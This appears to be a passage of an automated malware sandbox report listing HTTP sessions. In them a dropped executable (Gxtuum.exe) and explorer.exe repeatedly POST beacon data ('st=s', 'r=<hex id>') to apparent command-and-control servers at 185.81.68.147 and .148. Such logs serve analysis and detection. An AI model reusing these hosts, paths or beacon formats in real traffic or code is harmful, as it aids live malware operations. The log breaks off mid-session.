                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                86192.168.2.1150037185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:34.573340893 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:20:35.928637028 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:35 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                87192.168.2.1150042185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:36.226598024 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:36.346434116 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:37.667924881 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:36 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                88192.168.2.1150045185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:37.811259985 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:20:39.143651009 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:38 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                89192.168.2.1150047185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:37.898025990 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:38.017971039 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:39.535553932 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:38 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                90192.168.2.1150048185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:37.922828913 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:20:39.254393101 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:38 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                91192.168.2.1150053185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:39.773395061 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:39.893276930 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:41.373684883 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:40 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                92192.168.2.1150056185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:40.805394888 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:20:42.159787893 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:41 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                93192.168.2.1150058185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:40.973630905 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:20:42.330790997 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:41 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                94192.168.2.1150060185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:41.601263046 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:41.721060991 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:43.040301085 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:42 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                95192.168.2.1150064185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:43.273325920 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:43.393178940 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:44.965233088 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:43 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                96192.168.2.1150068185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:44.001538038 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:20:45.331218004 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:44 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                97192.168.2.1150069185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:44.104129076 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:20:45.510905981 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:44 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                98192.168.2.1150071185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:45.194926977 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:45.314944029 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:46.738065958 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:45 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                99192.168.2.1150072185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:46.962507963 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:47.082308054 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:48.410593033 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:47 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                100192.168.2.1150073185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:47.025933027 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:20:48.363445044 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:47 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                101192.168.2.1150074185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:47.356914043 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:20:48.678179026 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:47 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                102192.168.2.1150075185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:48.648075104 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:48.767887115 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:50.111821890 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:49 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                103192.168.2.1150076185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:50.202734947 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:20:51.517194986 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:50 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                104192.168.2.1150077185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:50.347898006 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:50.467912912 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:52.009980917 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:51 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                105192.168.2.1150078185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
